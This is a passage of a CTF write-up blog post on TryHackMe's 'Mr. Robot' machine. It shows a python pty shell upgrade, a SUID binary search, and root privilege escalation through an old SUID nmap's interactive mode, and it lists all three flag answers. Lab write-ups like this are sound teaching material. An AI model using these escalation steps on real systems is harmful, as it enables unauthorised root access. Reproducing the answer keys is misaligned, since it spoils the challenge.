We can do that with this command:\npython -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/sh\u0026#34;)\u0026#39; As you can see, the terminal didn\u0026rsquo;t show any errors, which means that we successfully created a shell in Python.\nLet\u0026rsquo;s sign in as the user robot.\n$ su - robot su - robot Password: abcdefghijklmnopqrstuvwxyz $ whoami whoami robot $ As we can see, we are logged in as the robot user.\nSecond key # To view the second key, we need to use the cat command:\ncat key-2-of-3.txt Result:\n$ cat key-2-of-3.txt cat key-2-of-3.txt 822c73956184f694993bede3eb39f959 Second key: 822c73956184f694993bede3eb39f959\nFinding the third key # HINT: NMAP\nIf we go back to the Nmap result we got at the beginning, we can see that the SSH port is closed. The final key is most likely located in the /root directory. To get root, we need to do a privilege escalation. The first thing that interests me is whether the user robot is in the so-called sudo group.\nPrivilege escalation # Is the user robot in the sudo group?\n$ sudo -l sudo -l [sudo] password for robot: abcdefghijklmnopqrstuvwxyz Sorry, user robot may not run sudo on linux. The user robot is not on the list with sudo privileges. Now we can see which programs run as the root user.\nChecking SETUID programs that are owned by root: # Command:\nfind / -user root -perm -4000 -print 2\u0026gt;/dev/null Output:\n$ find / -user root -perm -4000 -print 2\u0026gt;/dev/null / -user root -perm -4000 -print 2\u0026gt;/dev/null /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt_chown I immediately noticed /usr/local/bin/nmap. 
Let\u0026rsquo;s see what version of Nmap it is.\nChecking Nmap version: # Command:\nnmap --version Output:\n$ nmap --version nmap --version nmap version 3.81 ( http://www.insecure.org/nmap/ ) As we can see, the Nmap version is 3.81.\nEnumeration: # After a bit of research, I found out:\nLINK As we can read at the link above, this is an older Nmap version. Versions from 2.02 to 5.21 had the so-called interactive mode, which allowed us to execute commands. In addition, the SETUID bit will enable us to run commands as root.\n$ ls -l /usr/local/bin/nmap ls -l /usr/local/bin/nmap -rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap Starting Nmap in the interactive mode: # Command:\nnmap --interactive Output:\n$ nmap --interactive nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h \u0026lt;enter\u0026gt; for help nmap\u0026gt; !whoami !whoami root waiting to reap child : No child processes We see that Nmap\u0026rsquo;s interactive mode is running as root.\nFinding the final key: # We will first check if the third flag is in the /root directory.\nCommand:\n!ls /root Output:\nnmap\u0026gt; !ls /root !ls /root firstboot_done key-3-of-3.txt waiting to reap child : No child processes We found the third key, which is in a text file. We can read the content with the following command:\n!cat /root/key-3-of-3.txt nmap\u0026gt; !cat /root/key-3-of-3.txt !cat /root/key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4 waiting to reap child : No child processes Third key: 04787ddef27c3dee1ee161b21670b4e4\nConclusion # Interesting CTF with a lot of references to the series. I\u0026rsquo;ve learned a lot, and the most important thing is to regularly update operating systems and applications, as we see in the example with the older version of Nmap and WordPress. Also, do not allow anyone to hack your accounts: change your passwords regularly and use random passwords with a minimum length of 32 digits for each account. 
Everyone should follow one password, one account, and one email address.\nKeys # List of questions and answers:\nQuestions Answers What is key 1 ? 073403c8a58a1f80d943455fb30724b9 What is key 2 ? 822c73956184f694993bede3eb39f959 What is key 3 ? 04787ddef27c3dee1ee161b21670b4e4 Thank you for your time 💙 # ","date":"23 May 2021","permalink":"/blog/mr-robot-ctf/","section":"Blogs","summary":"🤖 TryHackMe Mr. Robot CTF 🤖 Can we hack Mr. Robot CTF? This virtual machine is rated medium and will teach us many useful things.\nThe instructions will help achieve the same answers; there are step-by-step instructions.","title":"Mr. Robot CTF"},{"content":"","date":"1 January 0001","permalink":"/tags/","section":"Tags","summary":"","title":"Tags"}]